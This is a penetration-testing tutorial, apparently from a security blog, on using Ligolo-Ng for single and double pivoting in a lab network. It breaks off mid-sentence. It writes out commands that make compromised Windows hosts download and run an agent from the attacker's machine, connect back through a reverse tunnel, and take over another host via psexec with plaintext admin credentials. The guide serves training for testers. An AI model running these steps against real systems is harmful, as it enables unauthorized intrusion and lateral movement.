At Deepwatch, "Empowering Your Digital Defense, Ensuring Your Peace of Mind"

Category: Database Hacking

A Detailed Guide on Ligolo-Ng

This guide covers lateral movement using Ligolo-Ng, a tool developed by Nicolas Chatelain. Ligolo-Ng establishes tunnels through reverse TCP/TLS connections using a tun interface, avoiding the need for SOCKS. The guide covers various aspects, from the tool’s unique features to practical applications such as single and double pivoting within a network.

Download Ligolo-Ng:

Ligolo-Ng can be downloaded from the official repository: Ligolo-Ng Releases.

Ligolo-Ng Overview:

Ligolo-Ng is a lightweight and efficient tool designed to enable penetration testers to establish tunnels through reverse TCP/TLS connections, employing a tun interface. Noteworthy features include being written in Go, VPN-like behavior, a customizable proxy, and agents in Go. The tool supports multiple protocols, including ICMP, UDP, SYN stealth scans, OS detection, and DNS resolution, offering connection speeds of up to 100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on disk or in memory.

Ligolo V/S Chisel:

Lab Setup

Follow the step-by-step guide for lateral movement within a network, covering both single and double pivoting techniques.

Prerequisites

Obtain the Ligolo ‘agent’ file for Windows 64-bit and the ‘proxy’ file for Linux 64-bit. Install the ‘agent’ file on the target machine and the ‘proxy’ file on the attacking machine (Kali Linux).

Setting up Ligolo-Ng

Step 1: After obtaining both the agent and proxy files, the next step is to set up Ligolo-Ng. To check the current status of the Ligolo-Ng configuration, use the ‘ifconfig’ command.
To activate it, execute the following commands:

    ip tuntap add user root mode tun ligolo
    ip link set ligolo up

Verify Ligolo-Ng activation with the ‘ifconfig’ command.

Step 2: Unzip the Ligolo proxy file:

    tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz

This proxy file establishes the connection through Ligolo, enabling the subsequent pivoting actions. To see the full range of options available in the proxy file, use the help option:

    ./proxy -h

Step 3: The options displayed in the preceding image are for using various types of certificates with the proxy. The chosen approach uses the ‘-selfcert’ option, which operates on port 11601. Execute the command as illustrated in the accompanying image below:

    ./proxy -selfcert

Step 4: After executing the above command, Ligolo-Ng is operational on the attacking machine. Next, to install the Ligolo agent on the target machine, unzip the Ligolo agent file using the command:

    unzip ligolo-ng_agent_0.5.1_windows_amd64.zip

To transfer this agent file to the target, start a server with the command:

    updog -p 80

Step 5: In the context of lateral movement, a session has already been acquired through netcat. Using the established netcat connection, the next step is to download the Ligolo agent file onto the target system. Referencing the image below, execute the following sequence of commands:

    cd Desktop
    powershell wget 192.168.1.5/agent.exe -o agent.exe
    dir

Step 6: The agent file has been downloaded successfully. Since the proxy file is already running on Kali, the next action is to execute the agent file:

    ./agent.exe -connect 192.168.1.5:11601 -ignore-cert

Upon executing this command, a Ligolo session is initiated. Then use the ‘session’ command, choosing ‘1’ to access the active session.
Once the session is established, execute the ‘ifconfig’ command as illustrated in the provided image. It discloses the existence of an internal network on the server, denoted by the IPv4 address 192.168.148.130/24. This discovery prompts further exploration into creating a tunnel through this internal network in the subsequent steps.

Single Pivoting

In the single pivoting scenario, the aim is to access Network B while staying within the boundaries of Network

Attempting a direct ping to Network B fails, as illustrated in the image below, because of the different network configuration. To progress towards the single pivoting objective, open a new terminal window. Then add the internal network to the IP route and confirm the addition, as illustrated in the image below, using the following commands:

    ip route add 192.168.148.0/24 dev ligolo
    ip route list

Return to the Ligolo proxy session window and initiate the tunneling process by entering the ‘start’ command, as demonstrated in the provided image.

Upon establishing a tunnel into Network B, we executed the netexec command to scan the Network B subnet, unveiling an additional Windows 10 entity distinct from DC1, as depicted in the image.

Pinging the IP now returns successful responses, in contrast to the previous unsuccessful attempts. Additionally, a comprehensive nmap scan can be conducted, as illustrated in the image below.

Double Pivoting

In double pivoting, our objective is to gain access to Network C from Network A, using Network B as an intermediary. From the newly opened terminal window, use the Impacket tool to access the identified Windows 10 machine with the IP 192.168.148.132.
Following this, execute the following set of commands to download the Ligolo agent onto Windows 10:

    impacket-psexec administrator:123@192.168.148.132
    cd c:\users\public
    powershell wget 192.168.1.5/agent.exe -o agent.exe
    dir

Then execute agent.exe. A session will be established, given that our Ligolo proxy file is already operational.

    agent.exe -connect 192.168.1.5:11601 -ignore-cert

On the Ligolo-ng proxy server, a new session corresponding to Windows 10 will be present, as indicated in the accompanying image. Execute the ‘start’ command to initiate additional tunnelling.

Execute the ‘session’ command to display the list of sessions. Navigate through the sessions using the arrow keys, selecting the desired session for access. In this instance, the aim is to access the latest session, identified as session 2. Select this session and use the ‘ifconfig’ command to inspect the interfaces. This reveals an additional Network C interface with the address 192.168.159.130/24, mirroring the details depicted in the image below.

After identifying the new network, the first step is to attempt a ping. However, the image below indicates an absence of connectivity between Kali and Network C. Add the Network C subnet to the IP route list with the following command. ip
